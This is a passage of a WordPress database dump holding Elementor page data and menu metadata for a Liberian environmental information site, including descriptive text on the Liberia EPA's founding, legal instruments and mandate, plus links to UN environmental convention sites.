Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12704,2074,'_elementor_edit_mode','builder'),(12705,2074,'_elementor_template_type','wp-post'),(12706,2074,'_elementor_version','2.7.5'),(12707,2074,'_wp_page_template','default'),(12708,2074,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2815956\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12710,1582,'_thumbnail_id','2715'),(12711,2075,'_elementor_edit_mode','builder'),(12712,2075,'_elementor_template_type','wp-post'),(12713,2075,'_elementor_version','2.7.5'),(12714,2075,'_wp_page_template','default'),(12715,2075,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2815956\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12716,2075,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(12717,2075,'_thumbnail_id','2035'),(12719,2077,'_elementor_controls_usage','a:0:{}'),(12721,2077,'_ca_post_type','1582'),(12722,2076,'_edit_last','1'),(12723,2076,'_elementor_controls_usage','a:0:{}'),(12724,2076,'_ca_handle','0'),(12725,2076,'_ca_host','sidebar'),(12726,2076,'_ca_merge_pos','0'),(12727,2076,'_edit_lock','1634557666:42'),(12728,2078,'_menu_item_type','custom'),(12729,2078,'_menu_item_menu_item_parent','0'),(12730,2078,'_menu_item_object_id','2078'),(12731,2078,'_menu_item_object','custom'),(12732,2078,'_menu_item_target','_blank'),(12733,2078,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12734,2078,'_menu_item_xfn',''),(12735,2078,'_menu_item_url','https://liberia-redd-sis.info/sis_database/activities_filter.php'),(12737,2078,'_menu_item_template',''),(12738,2078,'_menu_item_mega_template','0'),(12739,2078,'_menu_item_nolink',''),(12740,2078,'_menu_item_category_post',''),(12741,2078,'_menu_item_megamenu',''),(12742,2078,'_menu_item_megamenu_auto_width',''),(12743,2078,'_menu_item_megamenu_col',''),(12744,2078,'_menu_item_megamenu_heading',''),(12745,2078,'_menu_item_megamenu_widgetarea','0'),(12746,2078,'_menu_item_icon',''),(12747,2079,'_menu_item_type','custom'),(12748,2079,'_menu_item_menu_item_parent','0'),(12749,2079,'_menu_item_object_id','2079'),(12750,2079,'_menu_item_object','custom'),(12751,2079,'_menu_item_target','_blank'),(12752,2079,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12753,2079,'_menu_item_xfn',''),(12754,2079,'_menu_item_url','https://wash-liberia.org/'),(12756,2079,'_menu_item_template',''),(12757,2079,'_menu_item_mega_template','0'),(12758,2079,'_menu_item_nolink',''),(12759,2079,'_menu_item_category_post',''),(12760,2079,'_menu_item_megamenu',''),(12761,2079,'_menu_item_megamenu_auto_width',''),(12762,2079,'_menu_item_megamenu_col',''),(12763,2079,'_menu_item_megamenu_heading',''),(12764,2079,'_menu_item_megamenu_widgetarea','0'),(12765,2079,'_menu_item_icon',''),(12766,2078,'_elementor_controls_usage','a:0:{}'),(12767,2079,'_elementor_controls_usage','a:0:{}'),(12768,2080,'_menu_item_type','custom'),(12769,2080,'_menu_item_menu_item_parent','0'),(12770,2080,'_menu_item_object_id','2080'),(12771,2080,'_menu_item_object','custom'),(12772,2080,'_menu_item_target','_blank'),(12773,2080,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12774,2080,'_menu_item_xfn',''),(12775,2080,'_menu_item_url','http://lbr.forest-atlas.org/#l=en'),(12777,2080,'_menu_item_template',''),(12778,2080,'_menu_item_mega_template','0'),(12779,2080,'_menu_item_nolink',''),(12780,2080,'_menu_item_category_post',''),(12781,2080,'_menu_item_megamenu',''),(12782,2080,'_menu_item_megamenu_auto_width',''),(12783,2080,'_menu_item_megamenu_col',''),(12784,2080,'_menu_item_megamenu_heading',''),(12785,2080,'_menu_item_megamenu_widgetarea','0'),(12786,2080,'_menu_item_icon',''),(12787,2081,'_menu_item_type','custom'),(12788,2081,'_menu_item_menu_item_parent','0'),(12789,2081,'_menu_item_object_id','2081'),(12790,2081,'_menu_item_object','custom'),(12791,2081,'_menu_item_target','_blank'),(12792,2081,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12793,2081,'_menu_item_xfn',''),(12794,2081,'_menu_item_url','http://liberia.opendataforafrica.org/'),(12796,2081,'_menu_item_template',''),(12797,2081,'_menu_item_mega_template','0'),(12798,2081,'_menu_item_nolink',''),(12799,2081,'_menu_item_category_post',''),(12800,2081,'_menu_item_megamenu',''),(12801,2081,'_menu_item_megamenu_auto_width',''),(12802,2081,'_menu_item_megamenu_col',''),(12803,2081,'_menu_item_megamenu_heading',''),(12804,2081,'_menu_item_megamenu_widgetarea','0'),(12805,2081,'_menu_item_icon',''),(12806,2081,'_elementor_controls_usage','a:0:{}'),(12807,2080,'_elementor_controls_usage','a:0:{}'),(12808,2082,'_menu_item_type','custom'),(12809,2082,'_menu_item_menu_item_parent','0'),(12810,2082,'_menu_item_object_id','2082'),(12811,2082,'_menu_item_object','custom'),(12812,2082,'_menu_item_target','_blank'),(12813,2082,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12814,2082,'_menu_item_xfn',''),(12815,2082,'_menu_item_url','https://agrikore.com/libata'),(12817,2082,'_menu_item_template',''),(12818,2082,'_menu_item_mega_template','0'),(12819,2082,'_menu_item_nolink',''),(12820,2082,'_menu_item_category_post',''),(12821,2082,'_menu_item_megamenu',''),(12822,2082,'_menu_item_megamenu_auto_width',''),(12823,2082,'_menu_item_megamenu_col',''),(12824,2082,'_menu_item_megamenu_heading',''),(12825,2082,'_menu_item_megamenu_widgetarea','0'),(12826,2082,'_menu_item_icon',''),(12827,2082,'_elementor_controls_usage','a:0:{}'),(12828,2083,'_menu_item_type','custom'),(12829,2083,'_menu_item_menu_item_parent','0'),(12830,2083,'_menu_item_object_id','2083'),(12831,2083,'_menu_item_object','custom'),(12832,2083,'_menu_item_target','_blank'),(12833,2083,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12834,2083,'_menu_item_xfn',''),(12835,2083,'_menu_item_url','https://unfccc.int/'),(12837,2083,'_menu_item_template',''),(12838,2083,'_menu_item_mega_template','0'),(12839,2083,'_menu_item_nolink',''),(12840,2083,'_menu_item_category_post',''),(12841,2083,'_menu_item_megamenu',''),(12842,2083,'_menu_item_megamenu_auto_width',''),(12843,2083,'_menu_item_megamenu_col',''),(12844,2083,'_menu_item_megamenu_heading',''),(12845,2083,'_menu_item_megamenu_widgetarea','0'),(12846,2083,'_menu_item_icon',''),(12847,2084,'_menu_item_type','custom'),(12848,2084,'_menu_item_menu_item_parent','0'),(12849,2084,'_menu_item_object_id','2084'),(12850,2084,'_menu_item_object','custom'),(12851,2084,'_menu_item_target','_blank'),(12852,2084,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12853,2084,'_menu_item_xfn',''),(12854,2084,'_menu_item_url','https://unccd.int/'),(12856,2084,'_menu_item_template',''),(12857,2084,'_menu_item_mega_template','0'),(12858,2084,'_menu_item_nolink',''),(12859,2084,'_menu_item_category_post',''),(12860,2084,'_menu_item_megamenu',''),(12861,2084,'_menu_item_megamenu_auto_width',''),(12862,2084,'_menu_item_megamenu_col',''),(12863,2084,'_menu_item_megamenu_heading',''),(12864,2084,'_menu_item_megamenu_widgetarea','0'),(12865,2084,'_menu_item_icon',''),(12866,2085,'_menu_item_type','custom'),(12867,2085,'_menu_item_menu_item_parent','0'),(12868,2085,'_menu_item_object_id','2085'),(12869,2085,'_menu_item_object','custom'),(12870,2085,'_menu_item_target','_blank'),(12871,2085,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12872,2085,'_menu_item_xfn',''),(12873,2085,'_menu_item_url','https://cbd.int/'),(12875,2085,'_menu_item_template',''),(12876,2085,'_menu_item_mega_template','0'),(12877,2085,'_menu_item_nolink',''),(12878,2085,'_menu_item_category_post',''),(12879,2085,'_menu_item_megamenu',''),(12880,2085,'_menu_item_megamenu_auto_width',''),(12881,2085,'_menu_item_megamenu_col',''),(12882,2085,'_menu_item_megamenu_heading',''),(12883,2085,'_menu_item_megamenu_widgetarea','0'),(12884,2085,'_menu_item_icon',''),(12885,2086,'_menu_item_type','custom'),(12886,2086,'_menu_item_menu_item_parent','0'),(12887,2086,'_menu_item_object_id','2086'),(12888,2086,'_menu_item_object','custom'),(12889,2086,'_menu_item_target','_blank'),(12890,2086,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12891,2086,'_menu_item_xfn',''),(12892,2086,'_menu_item_url','https://www4.unfccc.int/sites/NWPStaging/Pages/Home.aspx'),(12894,2086,'_menu_item_template',''),(12895,2086,'_menu_item_mega_template','0'),(12896,2086,'_menu_item_nolink',''),(12897,2086,'_menu_item_category_post',''),(12898,2086,'_menu_item_megamenu',''),(12899,2086,'_menu_item_megamenu_auto_width',''),(12900,2086,'_menu_item_megamenu_col',''),(12901,2086,'_menu_item_megamenu_heading',''),(12902,2086,'_menu_item_megamenu_widgetarea','0'),(12903,2086,'_menu_item_icon',''),(12904,2087,'_menu_item_type','custom'),(12905,2087,'_menu_item_menu_item_parent','0'),(12906,2087,'_menu_item_object_id','2087'),(12907,2087,'_menu_item_object','custom'),(12908,2087,'_menu_item_target','_blank'),(12909,2087,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(12910,2087,'_menu_item_xfn',''),(12911,2087,'_menu_item_url','https://knowledge.unccd.int/'),(12913,2087,'_menu_item_template',''),(12914,2087,'_menu_item_mega_template','0'),(12915,2087,'_menu_item_nolink',''),(12916,2087,'_menu_item_category_post',''),(12917,2087,'_menu_item_megamenu',''),(12918,2087,'_menu_item_megamenu_auto_width',''),(12919,2087,'_menu_item_megamenu_col',''),(12920,2087,'_menu_item_megamenu_heading',''),(12921,2087,'_menu_item_megamenu_widgetarea','0'),(12922,2087,'_menu_item_icon',''),(12923,2083,'_elementor_controls_usage','a:0:{}'),(12924,2084,'_elementor_controls_usage','a:0:{}'),(12925,2085,'_elementor_controls_usage','a:0:{}'),(12926,2086,'_elementor_controls_usage','a:0:{}'),(12927,2087,'_elementor_controls_usage','a:0:{}'),(12928,2089,'_elementor_controls_usage','a:0:{}'),(12929,2089,'_ca_post_type','institution'),(12930,2090,'_elementor_controls_usage','a:0:{}'),(12931,2090,'_ca_post_type','related_topic'),(12932,2088,'_edit_last','1'),(12933,2088,'_elementor_controls_usage','a:0:{}'),(12934,2088,'_ca_handle','0'),(12935,2088,'_ca_host','sidebar'),(12936,2088,'_ca_merge_pos','1'),(12937,2088,'_edit_lock','1646909745:42'),(12938,2092,'_elementor_controls_usage','a:0:{}'),(12939,2092,'_ca_post_type','institution'),(12940,2093,'_elementor_controls_usage','a:0:{}'),(12941,2093,'_ca_post_type','related_topic'),(12942,2091,'_edit_last','1'),(12943,2091,'_elementor_controls_usage','a:0:{}'),(12944,2091,'_ca_handle','0'),(12945,2091,'_ca_host','sidebar'),(12946,2091,'_ca_merge_pos','1'),(12947,2091,'_edit_lock','1646908211:42'),(12948,2094,'_elementor_edit_mode','builder'),(12949,2094,'_elementor_template_type','wp-page'),(12950,2094,'_elementor_version','2.7.5'),(12951,2094,'_wp_page_template','default'),(12952,2094,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12953,2094,'_elementor_controls_usage','a:3:{s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(12955,2095,'_elementor_edit_mode','builder'),(12956,2095,'_elementor_template_type','wp-page'),(12957,2095,'_elementor_version','2.7.5'),(12958,2095,'_wp_page_template','default'),(12959,2095,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore to view reports, publications, policies and other related 